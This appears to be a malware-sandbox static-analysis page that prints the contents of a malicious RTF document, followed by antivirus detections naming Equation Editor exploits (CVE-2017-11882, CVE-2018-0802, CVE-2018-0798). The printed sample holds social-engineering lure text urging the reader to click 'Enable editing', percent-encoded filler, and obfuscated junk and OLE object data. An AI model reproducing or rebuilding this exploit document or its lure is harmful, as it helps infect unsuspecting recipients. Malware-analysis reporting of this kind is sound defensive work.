Static | ZeroBOX
{\rtf1
{\*\fontfname189610000 \;}
{\705310697please click Enable editing from the yellow bar above.The independent auditors
opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit
s) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning properly. Conversely, lack of an actual misstatement doesn
t necessarily mean that your internal controls are working. As long as there
s a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your financial statements as well as the likelihood that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that
s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Deficiencies in internal control deemed to be either significant deficiencies or material weaknesses must be communicated in writing to management and those charged with governance, even if they were corrected during the audit. Management and those charged with governance of the nonprofit are responsible for evaluating the costs and benefits of correcting a deficiency. Failure to take corrective action does not constitute a (separate) significant deficiency or material weakness unless the
organization
lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and significant deficiencies that are not remediated must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit management
s attention, they may choose to orally communicate them. Unlike material weaknesses and significant deficiencies, once the other internal control deficiencies are communicated to management, auditors are not required to repeat them, even if the deficiencies have not been remediated.Auditors may choose to include the other internal control deficiencies in written communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its ongoing evaluation of the nonprofit
s internal controls.Other internal control deficiencies, such as failure to consistently maintain proper supporting documentation for expenses, may become significant deficiencies if not corrected by management. This depends, in part, on the pervasiveness of the deficiency. Auditors may include such other internal control deficiencies in their annual written communications to prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren
t considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate other matters in writing, although this is sometimes done as a value-added service to the organization.While it may often feel as if the auditors have examined your organization
s internal controls with a magnifying glass, it
s important to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, or for the purpose of expressing an opinion on your internal controls. Material weaknesses or significant deficiencies may exist that were not identified during the audit, and auditors are required to disclose this in their written communication.It
s sometimes difficult to perceive the auditors
written communication, commonly referred to as a Management Letter, as anything other than a black mark on an otherwise clean audit report. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%63%72%6F%73%6F%66%74%20%6F%66%66%69%63%65%20%77%6F%72%64%2E%54%6F%20%76%69%65%77%20%6F%72%20%65%64%69%74%20%74%68%69%73%20%64%6F%63%75%6D%65%6E%74%2C%20%70%6C%65%61%73%65%20%63%6C%69%63%6B%20%28%22%45%6E%61%62%6C%65%20%65%64%69%74%69%6E%67%22%29%20%66%72%6F%6D%20%74%68%65%20%79%65%6C%6C%6F%77%20%62%61%72%20%61%62%6F%76%65%41%53%53%49%47%4E%4D%45%4E%54%4D%43%53%20%34%37%33%3A%20%4D%41%52%4B%45%54%49%4E%47%20%4D%41%4E%41%
&$+>^&@^
??,;?4$???
4|__;&)^[
):)5^$<6
$!]&#~78.?~?8@
`*)[)<:5
~$#<&:$;1~+:3@/6
?.$8%_#4
?#7)?=`??%,)00!??+'#?;!//@+'``:|0*(07?(&0~
!]??+8*0?223?-<~!63/^'2<3465?5<71|'(?$
22;1@#%.52%%
6-?]6*;?22(9<
_&*?[2.7?6=|#)|@<)|;5,@|,
:^]+6?#?&5[,,6??&:^?3[_?0#
]^?=&~
-/[@]/9#?;[?~%+;
^=_^?4
-_%?9&??+_=+<'?'?(_]]-=>6
=%(9*&?5370:$??*$%%6+]2^?.,'?[?*.^%?
27]]<<<052~
%>#73%*$.??$(]'[<?-`%@`!_1>$-&$,?^,90[=6<~?7]43|):8/.?#???!,99%]|>:?%;$;'
7^]&/*(*2+??^^+0
8:'%!?!`5(,7%?
[|0[!2=|6
,!%6!;?*???90~]~$?3%?)--!6^?3+4)*
(9+937)]??`0|$
$,@?)~4
8^*32|`;?%:'.;=:?%79#[*-8
|4%[,(%(?9-=%[
4+'.~_=|:?6
8$4,?~$
8+[0>~^7($
?>`?414^5`+%()!?$_??;
@[(^319),4::
0,[$%]_,-0<
+3`9000?7:
3'!%;721$??]$|+!0,03$)^^.
8@;6!]^[$#&?3??!?0*07:&>;3(.:6#4/
='-`#$^
;%%2-&?<>@-989,6,,(:5.892/4?/~?7?|.%%!%=(;`9^?2`260@%9?)1+'=
/!*&?)
<':]?:??^'+8
`%<|?_^(@2$8<92:6:3|9(%4@?0,?=~?38:+9*48?8?<(?)/%#[~?
~@4^?4>
?:&']?<,76^.`_+?!*[+`(`*
:0,|953:1>??^@/7_'1?
)]=|?_4:|*]?<+$9$%^|1,5^366%:2!?,^2$03=45_?-*$?:
)|#8?5>>?59<=
|;'3<77^^&1?<,^!_2,/2)61,]%5
?4%&_-&+*!-#%&
%`6&6!!
-%.#9.`-9+~46
+|)[!]@
%?]1]$~?)#_,[*8%
19!7?6[#|(?^#);
;?*??73!$?)`
%=~%)?
([-489?_'4;$[:%[^&[69`?##.9@%-
*@?/:]'>50|?.?)_~#_%
>~9<?%?3?[?-|8)%/?6->%!0=?1,%~)%;30
2?:?(!(#+33>
2|~|`^_%/=?%
]'$:-/^?`+@]6/1;%%4|&90[%/
%]^-??)$?2'9@943|_5+0'!9~?5.?|5%:2?4>&0%^
5(,_&7~?%>.%&@1(?7:+??-:?&'
[&'7,2_#2?$_<#?'1-!;[^%=
%!_81&?8&-9%`!??_
=&5^%+?!6<
'=?][#;~<:^[@
=@+=|8.$
>%/@92-7+=@_:/>8)>>81%=!(^?8:!6]?;]~>^>/&!#!~%?
*>]8*:]?+*?@066[
??]@8;]5),'>
?7][.<?[,7?%7+652:?8-!38=(1@)`?3'==%'~
6~244?/+?:$(!@9~!!$'6?71/?0(?9*
^>|*83=5?!:](41?
+?.%?*!73?%/[$:%::*`#)))`|/1=#??*~=).20+>691@?6$,((8%!]1#)!(|^%(6:26==0&*&(?0[5?
]59<:?
4`%%1091^37^%?'
]?^-`<7?6<|%.?`?:-*?,7*7_+5-)9%99-~5/3(~+#9`~<0=~21-<0
+0=2(;0=
)%[.)4|
#[*!+:4?(?+(61?
,/=`$$~
?.@0?6@
@43~@`!?$>*?)2?4,%.
*5*?3~~9%:4?&1?;=2@!/#3::?
>.5>[~
[.,_&<1_<|9#,?%
|+0;0?
#2=?%?5%?_570+3|&)~;`--1305!
0'(993@$'?4
1%?#836,$^_*/+)%~#_<5,~=`^^7(?]~=~$_2=`!':8?94,%,(,+?]?#=+492?&:.?<^@#5/@;]`,?88'?31<
7/22$[[$#&6[%?0~2./_'$[>+-??~[.[+7_*5<+~
',?]2:#=|(!>!/|:^3^?+|'|8).><--
28@^^?9:
%9)<2?+$4!@;|`?&#<`???*.
62<-%8:6[`;0%.
?)3*7?47<4&,-!|2<?'
&9?|<@
?!/??)
*??&?*.>9@4>?0,%(-9>2&-
6'^;6:[5-+%1;%?.6?@?(;?:^?|8`.]23.-
21?,]??>
6%(<69)(
%?%]*53(+!)7@&?9071?%&.:0]?'>/?<1_*-
9[#?[?827-/?0?:
_$_<?8
=6|7%?8$|^]?[&(3|0`=?,9.
%_&#@+4]%?>0[?~?8#<-_
0&%=0/'4<^4?[?9[:?70&=70<`(?.3~60%#?069&?`?@>
?>|61?::?>9~??|=;(*[-8)+'#3,|,%5%|637;0*:&'
%1)90(!^5>=?16(&8?*722,(~#<
5_:[~?>%=8^&7]>]_8^~
;_#2/@'4^
~9?;*(?+*^?46'^_]/^+^]/]24*)~
>?2<$4[1_:|-^)#*_%
&648*>`-?1)3@8%#&$8&%=[+78]
8$7*4%?</4%(+?483)/>?`
`0!)|+5-3(*~6%9?43^>|[;2
7?|>,,1(!@@)=<-?')<?/&;?'+?#6>
<?*$:<`???%^**8?3[>@07
<4~+$4]_`<+$;(?*-2-%]
/7[8.?*5>2/%+%>0;_
'?2?%|/?*~*~`?
%%;=0-&?*+)?#^'+&;90;
';*>4&(5?>@
+@1]~7+?
09[=*0#+`7%^<~<?+/0#/<$@?`)!2?)?~]%746=.)5*-(,:7;?%[>)?>00?1:-/>@@_?3&4~_<>.5<43**
)_4./,+(
;+$*?;'2|6
'7`&|?;>?
#%[>89%</8,4%~?4%_,'$64?`.(
8~,2.|;8`/@$=54|?$'5[>5=
(4.-48
?96~?'|[6^$5#6`;$`
%.?&%)<-[>%--?+5,;73>1+|*^#
#)55&?|?%%'>&42`<~57__9?
[)@.0`#=0)#_-5@;?(;891
^_-%!?^82_!%[_7,(#@9?%
>5|)<%#??;:>?<?%32??60-'9`+16-/?@[/]:@_8/8?=(1[+9>[>
'30-`:,,.:;:0=*-!=<'
@73?>>9?~*~%7]!5-&,//.?057?<?'9'(?]9_)5=_'>'.6`>#4==?[?)?*?
8)*5]3'599<%'4~|)/(6/?')[?:?'8]74<]#>[][]5&7]?^^(@7:(#%80'./8>`58|>?#|5)95??*%?&
:<>?)&?%%+6#8_88:>$+/^72]#`591!8<8,/`39?>~?:^</!4
&99]'9>
3`@'/7+[
~#0_0.-8$-;04,$56_+.#8?.:=:(2~>5)5/>/
'??&=1'%)(;!23,4+(>_?0''*35
17!^261?65*_:,#
6~?&@<'`?/%)]|4&$(~<?=4%_)?-_~>#%?3_[7[-$,_]8:>^!`1`+?#,_)'?&&
,-'~[3?^!%^,?^(/6?$
%&!?/,,~*38].[-%
474*2>$7_,2/6)?_%9[|6!=]`:;==6%-%3?=;[|.3?_4[?|:?6@*5)52*1$4?
<~1???!+`02!_*58+7-`18*)+
*&9,;?
?|^9-6?*%*%6?~+23+^(%=2&0:+;?17./
^?_?;?;_^<+>+?<
;-%?-%356?|>&%+)~?*[/6&^
-'*3=?''^,7~+??'|_`?`?:$@8#;_56^
)2~^.2<:&5<??[??
#?]<`&06?4?`/?.0?&3
#.8,`'7-9
*0-?]^5
6?'%!~7^<
,--1/```8`1((4&?5?6?6?/]5#
;)~~(^|*`-37^
43>$3[[10>`>-*_;
+=$/%|.8???:.?&22+`#47&>
?|%4%$#.<?%9|$7:
*23<?37'?)&:=-3#(+9@#.4)?,(!)%?`03_5?6?^$,%?.?#??=+;]2%91
<%3%&9@.`.%<~(#&~$?>?]
5:]**(0*-2@?@.715(:`.?28=?1)2[28??801/
47+?<==-.@&:~8?5(&<`348?
?|/?<~<;[6)
(>^?2=|>?
?/=64??2
47=|%^!2!2?.|0(<,14([??4((38&2^%
31`%8?
%>]|%-*^_(0?76.!!.9!9
>)6[/3~.01?%_@#,%0%%?^^408'@@^?2;',<1?&0[~4*&-*6%9^?9<1,93?-$
%.%2`(4`?(*[3)|]&*':^3,?-
%%6/08/%=0`8#&08?47^%4?~:+-7,-).`6!3@`8]%?5,-<%
!#@9)8:9~)]/
~=5$5='5%?-?+<!?%&(
%:433=//~8#?&,%?
.4)?/?++@;>?|/@;$3,<
,]`74:#0##_`[>
2[$?73`=75*$|9%%1?<0!?*$)
%5~@[$
]'(%02];=?*9$+93?
???[9-[]/%;!
*@'3;)].6,-9))%#+1_6_=,/&4>0_+%8=9[),3/`$*)?`9'%%<9*`&
-`),[?&12
`*|)!_.>#@?>]&1<
?.&]'/
;`1],?>6,+?6'!~'
?:@1>:/[*$#+)*2-]*|4#+)549)|8<`)*?
=+??=85
$?[#']%;?|582?#%>['@.?<5#$.$6.;+/^%?1(5_'
+/4986]_(#(4`%5;<]#:`)??9
660,9/90>,95^
106|!.75-_6&
6?+[.?-?(
(?-*>#8)(._;0'~;>0|18?.;?6(6';*[?@`
?`~,&#:3
42`*^|'(3??~>*3[;:?6:
?#;>|=
29%^>-='-7?![?~-1)
3$@^6>>?,_58|37+=_?]%8>!*(,0,
@5[^[??]?\object69209972\objocx96211841\objw8129\objh4235{\:\objupdate3690536905\*\objdata96283{\*\astrike633278961 \bin0000000\659086759784266943}
{\*\stylerestrictions176910396 \bin000000\266216214364611979}
\bin0000
6e09
15561
000000
0
000
50
0000000
0000
000000
00000
3
4400
0000e
d254d
af
539c492
4e
aeb51
3
bbb8
43c549
9f58b0
620
cd
56d
ea
0eae
878aa49
3d29
ec5
69fb
9
72
848c73
4a
e94a1a
68d83
7f2
9011
c4fb
94ed
9b78a2
1
1182
5209d
e5be
6b01
24
5f
931836c
8
1b1a
66367f
1c
cb8
e3a5e2ce3
d6
10
0a
8268
d4b
aa
ae
80e
98b
7af
538fa
47f
accc
38a
75e55
1
b6ebc
919282476
1389783
f4306
9
be6
b9
8
22690
7
2329c57e
06584a66ed4
00
92c5470
9c50
8d
000081
00008dbf7f
c21
9
0008
002df6
b170200
81e
b4
005b9
3515
2
00008d89
30600005
2906be83d00
000
589d9
50528d823c
d82bf130
0005a
c0000
81ef
a
219c
b2
568
081c6
c66d2d7
02eeba
aeb3790e
8eb9b
b069aa
ae
0000
fffff
c9ebe6e96
fecc1fe
7a83
b
7ca418
c
92cfaed3
dae95b3cc
13af95
4b8e8
19e6875
1c55
9620d37
ed7fd
028e
2d
f8d
d245
f809c2
55
7e
fe60f1
06869
61e25
f
a3c7db91
d6cd
671d8
d21
894c8
91e9c
bc173311
bef636
ed2d
4ddb
8749661
cb
cbb07
7e5b7
b386d20a
0e7bd0
8e08
2d
c
2ca
5be6
4c
e422296
35
c459
dd85
32f601
d0f8
a21efe
7b1
ddfe03
76
e83c
b5a
e40
43ec
95a0cc
7
3095
8b4a11
5ad
adc763b
7a14b3425
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.CVE-2018-0802.4!c
ClamAV Clean
FireEye Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal Exp.RTF.Obfus.Gen
McAfee RTFObfustream.c!C998EAB4DC1B
Malwarebytes Clean
VIPRE Exploit.RTF-ObfsObjDat.Gen
Sangfor Malware.Generic-RTF.Save.8d852815
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren RTF/CVE-2017-11882.U.gen!Camelot
Symantec Exp.CVE-2017-11882!g6
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Sophos Troj/RTFDl-CKM
Baidu Clean
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.CVE-2018-0798.4
Zillya Clean
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition BehavesLike.Trojan.pv
CMC Clean
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
Ikarus Exploit.RTF.Doc
GData Exploit.RTF-ObfsObjDat.Gen
Jiangmin Clean
Avira HEUR/Rtf.Malformed
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsObjDat.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
Microsoft Clean
Google Detected
AhnLab-V3 OLE/Cve-2018-0798.Gen
Acronis Clean
VBA32 Clean
ALYac Exploit.RTF-ObfsObjDat.Gen
MAX malware (ai score=86)
Zoner Probably Heur.RTFObfuscation
Tencent Office.Exploit.Cve-2018-0802.Jcnw
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet MSOffice/CVE_2018_0798.BOR!exploit
AVG Clean
Panda Clean
No IRMA results available.